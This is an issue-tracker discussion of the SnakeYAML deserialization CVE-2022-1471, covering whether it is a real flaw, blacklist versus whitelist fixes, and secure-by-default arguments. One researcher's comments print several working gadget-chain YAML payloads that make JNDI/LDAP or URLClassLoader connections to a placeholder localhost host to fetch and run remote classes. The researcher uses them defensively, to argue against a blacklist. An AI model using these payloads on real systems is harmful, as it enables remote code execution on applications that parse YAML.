CVE-2022-1471 (vulnerability in deserialization)

Issue #561 open
Kevin Lee created an issue

https://nvd.nist.gov/vuln/detail/CVE-2022-1471

CVE-2022-1471 was reported about a day ago and it says

SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.

Comments (159)

  1. Andrey Somov

    @Kevin Lee it may only execute code which is already present in your classloader.

    I hope the analysis will be clear enough.

  2. Alexander Shaposhnikov

    snakeyaml is used as a transitive dependency in a lot of packages. Does this “won’t fix“ mean the suggested way of handling this issue for them is migrating from snakeyaml to SnakeYAML Engine ?

  3. Andrey Somov

    Won’t fix means that there is no problem.

    Please read the issue - it is still under analysis/investigation.

    It only affects those who take untrusted data from unknown source - no one has presented a valid use case so far.

    Those who trust false positives may try to use the proposed solution - use SafeConstructor

  4. Alexander Shaposhnikov

    It is up to users of library and security researchers to determine if there is problem. It is still not fine, since scores of other vulnerabilities allow some limited form of, for example, file system access, but no RCE. This potentially elevates attacker’s access to RCE. Access to sending data to sockets in internal network is not actually RCE, but with this vulnerabilitiy very well might be. I can’t see how anyone can’t see it as a problem.

    To put it other way, trusted data can actually not be trusted, If your attacker is determined enough.

    So as I understand, there is no migration path suggested?

  5. Alexander Shaposhnikov

    Using SafeConstructor can be a way to proceed, but it kinda involves upgrading a lot of libraries, which has snakeyaml as a transitive dependency. In a meantime, users are vulnerable, is there a way to help them now?

  6. Andrey Somov
    1. how “sending data to sockets in internal network“ is related to this topic ?
    2. As already clarified - it is only possible to execute the code which is ALREADY present in the classloader
    3. the migration path is simple - use SafeContructor (which was already documented in SnakeYAML many years ago and no issue is reported since then)
    4. SafeContructor is a part of SnakeYAML (from the very beginning, more than 10 years) - no upgrade is required
    5. I strongly recomend you to study the topic for the further discussion
    6. Users are NOT vulnerable !!!

  7. Rade Martinović

    2. To be very strict - a lot of potentialy powerful classes could be present in the classloader. An attacker with good knowledge could potentialy gain access of wreck havoc by maliciously choosing a class to deserialize.

  8. Andrey Somov

    “a lot of potentialy powerful classes could be present in the classloader“ - can you pleaase give an example of the class and of the method ?

    Please read the issue !!!! Where does it say anything about a hacker ???

    It only concludes that a YAML may execute code. This is intentional - this is why people use YAML (otherwise they may use JSON)

    The issue is incomplete ! It is still under investigation. It is only a problem for those who trust low quality tooling and their false positives.

  9. Rade Martinović

    Hey @Andrey Somov don’t take this as an personal attack. I know you’re fed up with the security reports. I am too; our build job is failing because of these reports which are trully irrelevant when the only thing we’re parsing are the Spring configuration files.

    Let’s think this through together.

    In this example snakeyaml / snakeyaml / src / test / resources / constructor / car-with-tags.yaml — Bitbucket you can state tags. We could include, say ContextLoader (Spring Framework 6.0.2 API) class which could generate a lot of logs in the logger. We could repeat the attack ad nausem until the disk space is full.

    This is just a quick idea from the top of my head.

  10. Andrey Somov

    Why the hell you come here and not to the low quality tooling which creates false positives ?

    They must be aware that they create and promote trash reports.

    Your use case is unrelated to the reported issue. Because this is completely under your control. The issue is about executing code which is not intended to be run.

  11. Rade Martinović

    Why the hell you come here and not the low quality tooling which creates false positives ?

    Oh don’t worry, I go there too. I wrote emails several times in the past. I especially remember the “thousand laughs problem”, if I recall the name correctly.

    Your use case is unrelated to the reported issue. Because this is completely under your control. The issue is about executing code which is not intended to be run.

    In my case - we are in the control. However, in some use cases, or speaking in general that might not be the case. Purely academically speaking, I think (but I am not 100% sure) that my use case is valid. I think (just my opinion) that the point here is that before instantiating a class that there should be a check whether data type is matching expected datatype in the destination object that is being parsed. I guess SafeConstructor is already doing this?

  12. Andrey Somov

    The check does not solve the problem. When the YAML comes from untrusted source a hacker may provide a YAML with classes when they match but the code will be executed.

    But when the YAML comes from untrusted source it should be sanitized before it is given to the parser.

  13. Alexander Maslov

    I think this has been raised before and this is something which MUST be known by users of SnakeYaml. If not hope now it is known.

    WHOEVER feeding you with some YAML you don’t trust (or event mistakenly trust) may construct it in a harmful for your system way.

    This problem may be mitigated with the introduction of black/white instantiations lists. This is of course not going to solve real problems, but maybe shut those tools up…

  14. Andrey Somov

    Can we try to find a solution which makes this low quality tooling to shut up ? They create false positives far too often

  15. Rade Martinović

    The check does not solve the problem. When the YAML comes from untrusted source a hacker may provide a YAML with classes when they match but the code will be executed.

    This problem may be mitigated with the introduction of black/white instantiations lists.

    I think any whitelist (the blacklist approach would be rejected immediately by these “experts”) would be enough so that the reports such are these are resolved and never mentioned again. It could be a global whitelist (which I think would be scored as very safe) or dynamic whitelist at time of instantiation according to expected property types.

    Obviously this is not solving the real problem, but at least they won’t have any more bones to chew…

    EDIT: at least a start would be to share the demo project from https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2

  16. Alexander Maslov

    “Default Whitelist” approach is rejected by me :)

    As a default behavior SnakeYaml is not going to restrict what kind of classes can be instantiated.

    I would agree to blacklist some types by default and maybe provide functionality to the user to use his own whitelist, but only as an explicit configuration.

  17. Rade Martinović

    Of course there won’t be any global default whitelist. But with the whitelist ability present, Spring, and other users, could use it to allow only Classes which they would expect to be instantiated. I really hope it will be enough to appease the reporters of these issues.

    I still like the property type check before calling newInstance or constructObject.

    The blacklist I think it won’t help here much or at all.

  18. Alexander Maslov

    Of course whitelist is more restrictive and explicit, I agree.

    But I am not sure if that will help to close this vulnerability as default behavior is not going to change. I have no idea what is the process of those Vulnerabilities and if they put any “workarounds” in description or resolution, because this would require explicit action on the users.

    btw, here it is https://gist.github.com/TheGrandPew/748ac740698511975eaeed5d77ecb2d

  19. Andrey Somov

    It looks like the only class which should be black listed is javax.script.ScriptEngineManager

  20. Rade Martinović

    Just to repeat, not so sure about the blacklist approach, as it is not too difficult for security experts to think about another class which could load any class from the classpath.

    I think I am familiar with the source code now, so I could provide a PR with the whitelist approach sometime in January. I guess it’s not a huge rush to resolve this?

  21. Jonathan Leitschuh

    Hi! Open Source Software Security Researcher weighing in here. 👋

    It only concludes that a YAML may execute code. This is intentional - this is why people use YAML (otherwise they may use JSON)

    Sorry, please help me understand, is this a part of the YAML spec? Would you be so kind as to point to the part of the spec where this is detailed?

    It only affects those who take untrusted data from unknown source - no one has presented a valid use case so far.

    I don’t know if I fully understand the question here, but let me provide you a bit of insight: untrusted user supplied data is absolutely everywhere. Even an application’s config files can be “unsafe” if, for example, a company offers running a service that parses YAML config files, as a service.

    If you’d like a real world example: https://nvd.nist.gov/vuln/detail/CVE-2022-21404

    And here is the write up about this vulnerability: https://www.websec.ca/publication/Blog/CVE-2022-21404-Another-story-of-developers-fixing-vulnerabilities-unknowingly-because-of-CodeQL

    As already clarified - it is only possible to execute the code which is ALREADY present in the classloader

    This is mostly, true. This is why security researchers, and black hats leverage what are called deserialization gadgets to achieve remote code execution on systems with these vulnerabilities.

    Background Info: Several object-oriented programming languages allow to serialize objects, so that they can be easily transferred and later deserialized to be processed again. Some of them trigger side effects during deserialization. In that case, special care must be taken when deserializing user-controlled data, or else insecure deserialization vulnerabilities may occur. In order to exploit such a vulnerability, attackers must provide a malicious serialized object to the application. Upon deserialization, a combination of side effects performs attacker-supplied actions, similar to executing attacker-supplied code. A combination of side effects is called gadget chain. Gadget chains can be found by inspecting the affected application for classes that provide side effects and composing affected instances. In order to map all classes available for an exploit, it often helps to identify dependencies such as frameworks or libraries used by the vulnerable application.

    https://blog.redteam-pentesting.de/2021/deserialization-gadget-chain/

    The javax.script.ScriptEngineManager is an example of a deserialization gadget chain, but I can almost guarantee you that it is not the only one that exists.

    It looks like the only class which should be black listed is javax.script.ScriptEngineManager

    As a security researcher, I would caution you about this line of thinking. Stating that “this is the only class which should be black listed” is not considering the multitude of classes that end up running within the JVM at runtime. This is why security researchers developed tools like YSoSerial which is designed to look at a given classloader and build deserialization chains. If you begin using a black list, this is the bypass they will move forward with next.

    the blacklist approach would be rejected immediately by these “experts”

    The problem with a black list is it creates a constant game of whack-a-mole for the maintainers of this project that I can imagine you wouldn’t enjoy playing long term. This rejection is both because it’s less secure and I will save the maintainers time, effort, and energy.

    Advice

    The best model for security is “secure by default”. IE. I believe that SafeConstructor, or something similar that does not allow arbitrary deserialization, should be the default for the new YAML() constructor.

    Allow developers to opt-out, if that’s the behaviour they desire, but the default should be secure and not allow for arbitrary code execution or deserialization to arbitrary objects. This is the model that FasterJackson followed. Arbitrary object deserialization is only allowed if you use specific annotations, or if you call enableDefaultTyping() (I personally dislike this name as it’s a bit to innocuous for the security risk you introduce by calling it). You can read more about this in the FasterJackson maintainer’s write up here: https://cowtowncoder.medium.com/jackson-2-10-safe-default-typing-2d018f0ce2ba

    Reach Out

    I’ve got a lot more thoughts on this, and I’m happy to share my knowledge and experience as a security researcher with you all further. If it would be helpful, don’t hesitate to setup a call with me. I’m more than happy to sit down and have a conversation with any of you about this topic in more depth. https://calendly.com/jonathan-leitschuh-at-dan-kaminsky-fellowship

  22. Andrey Somov

    Dear Jonathan, thank you. I see now how much must be explained. You miss a lot of context and I do not want to reply here.

  23. Jonathan Leitschuh

    So, I looked at the PR you created above, and I want to again caution you against going down this path of attempting to black list classes to prevent this vulnerability.

    I looked at the research done by Moritz Bechler back in 2017 regarding achieving remote code execution via unmarshallers, like SnakeYaml. (For reference, this paper can be found here: https://github.com/mbechler/marshalsec).

    I just want to make you aware that his tool, marshalsec, already has additional gadget chains for SnakeYaml that can allow an attacker to achieve remote code execution:

    For SpringPropertyPathFactory

    !!org.springframework.beans.factory.config.PropertyPathFactoryBean
      targetBeanName: "ldap://localhost:1389/obj"
      propertyPath: foo
      beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory
        shareableResources: ["ldap://localhost:1389/obj"]
    

    For SpringAbstractBeanFactoryPointcutAdvisor:

    set:
      ? !!org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor
        adviceBeanName: "ldap://localhost:1389/obj"
        beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory
          shareableResources: ["ldap://localhost:1389/obj"]
      ? !!org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor []
    

    For XBean:

    !!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Exploit", "http://localhost:8080/"], !!org.apache.xbean.naming.context.WritableContext []]]
    

    For CommonsConfiguration:

    set:
      ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://localhost:1389/obj"]]
    

    For C3P0WrapperConnPool:

    !!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
      userOverridesAsString: "HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400074578706c6f6974740016687474703a2f2f6c6f63616c686f73743a383038302f740003466f6f;"
    

    For C3P0RefDataSource :

    !!com.mchange.v2.c3p0.JndiRefForwardingDataSource
      jndiName: "ldap://localhost:1389/obj"
      loginTimeout: 0
    

    For JdbcRowSet:

    !!com.sun.rowset.JdbcRowSetImpl
      dataSourceName: "ldap://localhost:1389/obj"
      autoCommit: true
    

    For ScriptEngine:

    !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]
    

    For ResourceGadget:

    [!!org.eclipse.jetty.plus.jndi.Resource ["__/obj", !!javax.naming.Reference ["foo", "Exploit", "http://localhost:8080/"]], !!org.eclipse.jetty.plus.jndi.Resource ["obj/test", !!java.lang.Object []]]
    

    Many of these payloads are leveraging JNDI, to force an LDAP connection that downloads and then executes an arbitrary class file on the JVM. This is very similar to how the famed Log4Shell exploit (CVE-2021-44228) worked.

    To reiterate what I said above, researchers and black hats will find more payloads like these ones. The best defense, as the Log4J team also discovered, was to disable the feature by default and allow organizations to enable the risky feature on a case-by-case basis, allowing them to intentionally accept the risk associated with that decision.

  24. Marcel Stör

    Thank you Jonathan. I am far from being expert on this subject. Yet, your arguments make absolute sense and it’s easy to understand why the blacklist approach effectively achieves nothing.

  25. Alexey Belostotsky

    Considering that it’s unlikely that explicit class instantiation is used very widely by the library consumers (although I might be wrong here), it would make more sense to either remove constructors with implied Constructor, therefore making it a user concern to pick the right constructor in accordance to security and other requirements. Or replace implied Constructor with SafeConstructor, making this behavior explicitly opt-in

    Of course, it’s a breaking change, but it would make sure it’s safe to use this library by default, without any extra configurations (yes, people are stupid and are likely not to read the docs thoroughly, so it’s better to make sure they won’t shoot themselves in the leg if they don’t want to read the documentation completely)

  26. Jeff Bennett

    Comments from the peanut gallary… I am just a casual user of snakeyaml library, and found my way here specifially because of the current CVE. @Andrey Somov Thank you for your work to get this issue resolved. You probably catch a lot of flack, but your work is appreciated by the thousands that benefits from a useful library like this. While we do not have your intimate knowledge of the library, nor the sweat-equity that you possess, please appreciate the predicament we find ourselves in. Corporate IT pays big money for those “low quality tooling” solutions, and the reports go up not through the Enterprise Development community, but instead to the IT DevSecOps folks. When CVEs occur, especially high-critical ones, it’s crisis mode from the very beginning. They cannot (choose not to?) differentiate between CVE-2022-1471, a probable non-issue, and HeartBleed, Log4Shell, and countless other issues of similar criticality. DevSecsOps screams ‘fix it’ and as a developer, we immediately have three levels of management watching us and asking us how it is going. No one wants this. It makes our (the users) life miserable. It makes your life miserable. I wish there was an easy way to “fix the tool” and make dumb reports go away, but there isn’t. Likewise, I have little ability to convince my boss’s boss’s boss that ignoring this issue is OK (“just trust me”) - she’s putting her reputation and job on the line, and better to ‘fix it’ than ‘ignore it’.

    All of that is what leads people to recommend “Secure By Default”. If you are selling people a loaded gun, put the safety on for them, and teach them how to turn it off if they need to. Most won’t need to. From a CVE perspective, that means they have to document a whole bunch more things that someone would have to do to trigger the vulnerability, and that gives folks (like me) the ammunition to say “we are not impacted” and avoid coming to the library to check for a solution.

    Lastly, heartfelt thank you for all you do. I mean it. Thanks for reading.

  27. Alan Bertoletti

    hi @Andrey Somov

    Please, when the version 1.34 is gonna be available for download ?

    thank you

  28. Rade Martinović

    Hey @Alan Bertoletti ,

    Please review all information in this ticket.

    if you feel you could help, please provide a PR which could resolve the issue.

  29. Andrey Somov
    1. Thank you Jeff for the clarification that all we do - we compensate the mistakes of low quality tooling for those who do not understand the subject
    2. 100% of the application which use SnakeYAML do not parse data from untrusted sources. It means “secure by default“ will satisfy the low quality tooling and not the community (which has to suffer a lot because of the breaking backwards-incompatible changes to support quasi “secure“ feature)
    3. The solution may be proposed to the libs which allow remote code execution (the list is above). These libs may introduce “secure by default“.

  30. Jonathan Leitschuh

    100% of the application which use SnakeYAML do not parse data from untrusted sources.

    Unfortunately, this is not the case. Since my post 4 days ago, I have found at least two projects, one with 700+ stars on GitHub, and the other with over 5,000. Both have remotely exploitable RCE vulnerabilities because of this exploit vector. I was able to work with someone from the GitHub Security Lab to create a POC and will be reporting to those projects shortly.

    Here’s a third case where Oracle issued a CVE due to this exact vulnerability appearing in one of their applications: CVE-2022-21404 https://www.websec.ca/publication/Blog/CVE-2022-21404-Another-story-of-developers-fixing-vulnerabilities-unknowingly-because-of-CodeQL

    Here are some other cases too:

    CVE Project GitHub Stars
    CVE-2022-31691 STS4 extensions for Eclipse and VSCode 698
    CVE-2021-41110 cwlviewer 37
    CVE-2021-21249OneDev OneDev 10,500
    CVE-2020-1947 Apache ShardingSphere 17,800
    CVE-2016-8744 Apache Brooklyn 132

    The solution may be proposed to the libs which allow remote code execution (the list is above). These libs may introduce “secure by default“.

    Some of them have in the past. However, I want to share with you a quote form Moritz Bechler who wrote the 2017 paper “Java Unmarshaller Security: Turning your data into code execution”:

    People tend to be looking for someone to blame. Should a hashCode()/equals() or a property accessor implementation invoke any code with possible side effects?76 While that might be bad style in general, it may be necessary to get correct behavior in others. Should an unmarshaller assume that all types follow some implicit contract? Probably not, but without any form of contract there is not much they could do. Should developers be more concerned with the security implications of technologies they use, including actually reading warnings in the documentation, and less with their convenience? Certainly.

    For Java Serialization (3.2.1) we have seen some libraries, namely commons-collections and groovy, “fixing” gadgets in their code. It’s the author’s opinion that this was a bad choice, leaving many exploitable instances as the fundamental problem often remained unfixed. Also, in many cases, it is not even possible to implement such mitigations for the mechanisms described in this paper as there is no way a type could prevent its own unmarshalling.

    These libs may introduce “secure by default“.

    In my opinion, and the opinion of Effective Java, constructors should do no, or minimal, work. I believe that the argument you are making is that these constructors are badly behaving by performing actions beyond the simple act of constructing an object.

    That being said, some of these payloads don’t leverage the behaviour of the constructor to achieve RCE. Take for example this payload:

    set:
      ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://localhost:1389/obj"]]
    

    This leverages the behaviour that when adding an item to a set the following chain of calls occur:

      java.lang.Thread.State: RUNNABLE
          at com.sun.jndi.ldap.Connection.<init>(Connection.java:220)
          at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
          at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
          at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2849)
          at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:347)
          at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
          at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
          at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
          at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
          at javax.naming.InitialContext.lookup(InitialContext.java:417)
          at org.apache.commons.configuration.JNDIConfiguration.getBaseContext(JNDIConfiguration.java:452)
          at org.apache.commons.configuration.JNDIConfiguration.getKeys(JNDIConfiguration.java:203)
          at org.apache.commons.configuration.JNDIConfiguration.getKeys(JNDIConfiguration.java:182)
          at org.apache.commons.configuration.ConfigurationMap$ConfigurationSet$ConfigurationSetIterator.<init>(ConfigurationMap.java:161)
          at org.apache.commons.configuration.ConfigurationMap$ConfigurationSet$ConfigurationSetIterator.<init>(ConfigurationMap.java:154)
          at org.apache.commons.configuration.ConfigurationMap$ConfigurationSet.iterator(ConfigurationMap.java:207)
          at java.util.AbstractMap.hashCode(AbstractMap.java:528)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructMapping2ndStep(BaseConstructor.java:366)
          at org.yaml.snakeyaml.constructor.SafeConstructor.constructMapping2ndStep(SafeConstructor.java:147)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructMapping(BaseConstructor.java:354)
          at org.yaml.snakeyaml.constructor.SafeConstructor$ConstructYamlMap.construct(SafeConstructor.java:489)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:182)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructMapping2ndStep(BaseConstructor.java:373)
          at org.yaml.snakeyaml.constructor.SafeConstructor.constructMapping2ndStep(SafeConstructor.java:147)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructMapping(BaseConstructor.java:354)
          at org.yaml.snakeyaml.constructor.SafeConstructor$ConstructYamlMap.construct(SafeConstructor.java:489)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:182)
          at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:141)
          at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:127)
          at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:450)
          at org.yaml.snakeyaml.Yaml.load(Yaml.java:369)
    

    This call chain is possible, not because of a misbehaving constructor, but because SnakeYaml calls hashCode on an untrusted object, leading to remote code execution.

    My question to you, @Andrey Somov , is how do you propose that library authors defend against this attack vector? Keeping in mind that SnakeYAML intentionally bypasses declared access modifiers on constructors and setter methods by intentionally calling setAccessible(true) (link) to allow access to private, protected and package-private methods.

    Again, I’m more than happy to sit down and have a deeper conversation with you on this. Please don’t hesitate to schedule some time on my calendar. https://calendly.com/jonathan-leitschuh-at-dan-kaminsky-fellowship

  31. Rade Martinović

    To add a different perspective - the definition of “trusting the source” is different to every other developer. Some deem some sources as secure, some don’t. What cannot be denied is that if someone deems something as insecure, we must consider the statement seriously and consider the implications.

    Instead of debating on trust, the easiest way out would be whitelisting. Some (many, most?) developers actually are unable to assess trust considering all aspects of trust. For such (many, most?) developers, the only way forward is with such a feature. This exact scenario already played out for FasterXML. 20 CVEs later, they finally introduced a polymorphic whitelist.

    Here’s an idea - the whitelisting does not have to be necessarily turned on by default. It could be the responsibility of the library users to set it to true. This will allow SnakeYAML to be used in configurations which are deemed secure. What do you think Jonathan? Would that suffice?

  32. Daryl

    Instead of debating on trust, the easiest way out would be whitelisting.

    As a developer I don’t like jumping through security hoops to make something work. What’s going to happen is, DevOps is going to take control of that whitelist away, and developers won’t be able to do anything without them. I like the solution where whatever the problem code is, is just disabled by default. Just my two cents.

    Here’s an idea - the whitelisting does not have to be necessarily turned on by default.

    I think any solution that isn’t the default solution is going to result in NexusIQ screaming at us about a CVE. Then we have to research the issue, go through the bureaucracy, and prove we aren’t triggering the issue.

  33. Andrey Somov

    DevOps is going to take control of that whitelist away, and developers won’t be able to do anything without them.

    The issue shows the amount of confusion. This is very sad.

  34. Jonathan Leitschuh

    The issue shows the amount of confusion. This is very sad.

    Is there some context I’m missing that I could review to better understand your perspective on this problem? I want to understand what constraints you’re working under so we can both secure end users and not diminish the power that this library unlocks for other users.

  35. Daryl

    The issue shows the amount of confusion. This is very sad.

    I get it. You are freely maintaining this amazing software that is used all over the place, including for Spring, and you don’t want to jump through hoops because so many companies are setting up bureaucracies around this.

    I’m just saying, if you show a business something like this whitelist concept and tell them it’s because bad yaml files can remotely execute code and that is a CVE level 10 security breach, they are not going to trust developers with that whitelist. I’m imagining a scenario where I can’t add a custom yaml file to Spring without asking DevOps or whichever team is handling security. Maybe if I understood the situation with your code better, I wouldn’t think that’s possible. I’m just saying, please consider the bureaucracy that many developers do have to deal with because this is a major headache for us, and we usually cannot convince the businesses we work for not to get rid of the “low quality tooling and false positives.” These CVE’s come from a highly accredited government sponsored organization that tracks all publicly known security vulnerabilities and the “low quality tooling” trusts whatever they say. CVE is the one with the “false positive.” They either need to be convinced this issue has been resolved with a new version or they need to be convinced that this is not a security a vulnerability to begin with, which I’m guessing will be very hard to do.

  36. Daryl

    I’ll add, it is my understanding that most security organizations are on the warpath against remote code execution. There is a similar CVE open against Spring Web that has never been closed because they refused to fix it until 6.0. That’s been a headache too. That CVE describes an issue that is not a valid use case, and my understanding of this is you believe the same thing about this CVE. Even if you are correct, they didn’t remove the CVE on Spring Web, and I understand that issue better so I can say with confidence that CVE was a false positive. In summary, CVE seems to shoot first and ask questions later when it comes to remote code execution, so open source developers either need to convince them to lighten up (unlikely) or not make code that looks guilty of remote code execution.

  37. Rade Martinović

    Hey Daryl,

    Thank you for your long-ish input on the topic.

    I think if it was not clear before that now it is clear to everyone that compliance is hard in large organizations. I do belong to such organization myself.

    However, large organizations operate for profit. That’s why I am a member of my organization. I’m guessing you are not volunteering in your organization?

    I am sure if you remember the RCE topic in Spring (I also had to sanitize the Sonatype report because of the CVE taking away my precious time) that you remember another RCE - Log4shell. That was quite an earthquake. Do you know what is the biggest problem with log4shell? That the amount of damage that it caused is unknown. After Heartbleed and all others - log4shell showed that the approach of being secure first is actually - cheaper for large organizations (but honestly for organization of any size). The damage that single RCE leak can cause is immeasurably larger than lost dev hours or days.

    So, I do feel that you’ve had had headaches due to security issues being thrown your way. I am in the same boat. But trust me - a single exploitable RCE could mean that your company could lose money, clients or even get locked altogether. So many more people would get headaches.

    I hope you can understand that.

  38. Daryl

    You kind of made my point, Rade. While I disagree with some of the CVE’s on RCE since they seem to cover invalid use cases (or perhaps grey areas would be better since the RCE is technically there, it just doesn’t make sense for anybody to trigger it?), I realize that security organizations will not budge on going nuclear on all RCE vulnerabilities no matter how trivial. The only thing that can be done is fix the library so it can do its thing without setting off CVE’s. If it’s an invalid use case, we shouldn’t have code to do it. Spring Web had a couple classes nobody needed, and they could have deleted or moved them to another module, and they wouldn’t do it. If this situation is truly analogous to that, then I hope the developers on this project will decide differently.

  39. Daryl

    SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.

    Is there a reason the Constructor() could not simply be hollowed out and redirected into the SafeConstructor() for backwards compatibility’s sake? Old code could still use the library, but SafeConstructor would fix the vulnerability. If it’s truly a “false positive” then nobody should be using Constructor() in an unsafe way right?

  40. Andrey Somov

    Dear Jonathan Leitschuh, why not to jump in and and expain basic things ? (many !!!)

    Dear Daryl, if you do not see the difference between a CVE issue (which is not a false positive), and the noise from low quality tooling (false positives) I cannot help you. I hope Jonathan should clearly show the difference.

  41. Marcel Stör

    @Andrey Somov you frequently use the phrase “low quality tooling“ to disqualify reports by said tools. Yet, to my knowledge you never described what exactly you mean by that phrase. Can I ask you to elaborate on that?

    If by “low quality tooling“ you refer to things like OWASP Dependency Check then I think it’s highly unfair to discredit them. The tools or their output can only ever be as good as the data they operate upon. If a CVE in the NVD is “low quality” then it can’t be the fault of a tool to report upon it. Don’t shoot the messenger they say.

  42. Andrey Somov

    @Marcel Stör I have wasted tons of time explaining it. One more time.

    1. CVE and NIST are no low quality tooling. This is a source for the information for those who understands it (I got now why the Bible was not allowed to be read by everyone)
    2. CVE and NIST are the messenger (Don’t shoot the messenger)
    3. Low quality tooling is the reason you are here. It is a tool which pretends that it uses CVE to warn users. They ignore the most important part of CVE - the context. They create noise (false positives) based solely on the name and version of the library/package.
    4. The community should be aware that the low quality tooling is confusing on purpose. This is the way to show its importance to earn money.

  43. Jonathan Leitschuh

    Dear Jonathan Leitschuh, why not to jump in and and expain basic things ? (many !!!)

    Sorry, I don’t understand what you’re trying to communicate here. Would you be so kind as to elaborate? Is there a resource I can read, or an existing email thread that contains the context? I can understand why you may not want to reiterate what you’ve stated before to others, and I’m happy to read previous communications you may have had with others on this topic.

    Dear Daryl, if you do not see the difference between a CVE issue (which is not a false positive), and the noise from low quality tooling (false positives) I cannot help you. I hope Jonathan should clearly show the difference.

    Let me see what I can do. To be clear, this is my assessment of how the world, including the CVE system currently works. Is it perfect, no, but it’s what we have to communicate to the world that a project is, in some way, vulnerable.

    Low quality tooling is the reason you are here. It is a tool which pretends that it uses CVE to warn users. They ignore the most important part of CVE - the context. They create noise (false positives) based solely on the name and version of the library/package.

    The community should be aware that the low quality tooling is confusing on purpose. This is the way to show its importance to earn money.

    Trying to encode this context into a detector is an incredibly complex task. Most tooling just looks at the dependency graph and compares that against the list of open CVEs, and will fire off an alert if the vulnerable version is detected. This is what you would consider “low quality tooling”.

    I presume your “high quality tooling” would do something like walk the source code, and then attempt to determine if the code calling SnakeYaml is done so in a way that is safe or not. To be clear, this is an incredibly complex problem. It would involve looking at a program’s data flow, control flow, not just in your application code, but in ever single dependency and transitive dependency to determine if this code is called in an insecure way or not. I believe that there are one, maybe two companies that attempt to do this, but it is an incredibly difficult problem to solve.

    Unfortunately, the way the CVE system is integrated into a majority of systems is that a CVE is assigned to a vulnerable version range. When the CVE is “all versions are vulnerable” or, “there is no fix possible through just an upgrade”, the tooling that the industry has built breaks down and maintainers, like yourself, Andrey, end up in issue threads like this. I’ve seen this before.

    This is the core reason why security practitioners push for the model of “secure by default”. Because then, in a majority of cases, the fix, and the easiest way to resolve a CVE, is just to update a dependency. I can guarantee that you that doing so will save yourself, and your end users, a significant amount of cycles dealing with this problem on this version, and all future releases. SnakeYAML should change the default to be secure.

    To quote Jeff Bennett from above: “if you are selling people a loaded gun, put the safety on for them, and teach them how to turn it off if they need to.”


    Andrey, many of the arguments you originally shared for why this feature has remained enabled by default have been rebutted:

    The issue is incomplete ! It is still under investigation.

    The issue is no longer under investigation and has been assigned a severity of 9.8/10 by the NVD.

    it may only execute code which is already present in your classloader.

    I provided a long list of payloads that allow an attacker to achieve remote code execution here.

    It is only a problem for those who trust low quality tooling and their false positives.

    This has been a long-term problem, with a long history of OSS projects having to assign CVEs because of the RCE vulnerability SnakeYAML exposes when developers don’t understand the default configuration of SnakeYAML allows them to shoot themselves in the foot. See the list of CVEs I created above.

    100% of the application which use SnakeYAML do not parse data from untrusted sources. It means “secure by default“ will satisfy the low quality tooling and not the community

    Again, see the list of CVEs I created above. I’ve also reported two additional vulnerabilities to OSS projects. I’ve started a 90-day disclosure timeline with them both.

    which has to suffer a lot because of the breaking backwards-incompatible changes to support quasi “secure“ feature

    This is why semver has the major version number. To indicate an API breaking change. I think this is a completely valid use case for revving this number. It’s not a bad thing to have to do so when the result is improved security for your end users.

    It only concludes that a YAML may execute code. This is intentional - this is why people use YAML (otherwise they may use JSON)

